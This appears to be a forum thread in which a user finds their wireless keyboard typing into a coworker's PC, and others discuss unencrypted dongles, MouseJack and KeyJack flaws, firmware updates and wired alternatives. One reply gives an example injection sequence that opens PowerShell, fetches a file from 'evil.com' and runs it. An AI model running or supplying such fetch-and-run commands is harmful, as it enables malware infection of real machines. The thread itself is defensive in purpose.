I aways wondered if the communication channel between my wireless keyboard and the usb receiver-antena is secure. I never bother to reseach this. Today I figured out the practical way. I turned on my pc at work and I tried to type the first letter of my password. Nothing hapened. Then I started spamming that letter. Still nothing, until the person next to me said “my keyboard is typing all by itself”. It turns out she has a wireless mouse with a seemigly identical receiver-antena usb.
The moral of the story. If it was so easy to almost leak my password unintentionally due to this flaw of wireless keyboard communication, imagine wad a bad actor can do intentionally. Why try to brute force, social engineer e.t.c. when your password can be stollen in transit from your keyboard to your pc.
This strongly depends on the brands you use. Unencrypted, automatically re-pairing devices are not normal, it just sounds like you and your coworker bought devices from questionable brands. Logitech keyboards and dongles encrypt key presses, for example. You do need to regularly check for firmware updates for both your keyboard and the receiver (sometimes vulnerabilities are found and despite the spyware Logitech wants to install onto your computer, these updates aren’t done automatically) but they’re generally quite safe.
Something perhaps more worrying: unencrypted keyboards will also let anyone in range inject keystrokes. A simple win+r, powershell.exe, wget http://evil.com, ./evil.exe could infect your computer if you look away for just five seconds.
These pages show how various brands deal with such security bugs: KeyJack Affected Devices, MouseJack Affected Devices. TL;DR, don’t use anything from Microsoft or AliExpress/Amazon Basics and update your firmware.
Thanks. For what kind of specs I should be looking when byuing a wireless product? What key words I should be looking for?
deleted by creator
I’ll probably going to update to wired. It has all of the advanteges except portability. The only reason I got that wireless keyboard was that I needed something small, chaeap and portable.
Hmm, do you want a keyboard with firmware updates that encrypts keybresses…
Or simply use USB?..
USB works great but you need a lot of extension cables to control your media center PC from the couch, and they’re usually not exactly up to spec either.
I don’t use a wireless keyboard, I do have a wireless mouse for travelling, though. Sometimes wireless makes sense, sometimes it doesn’t.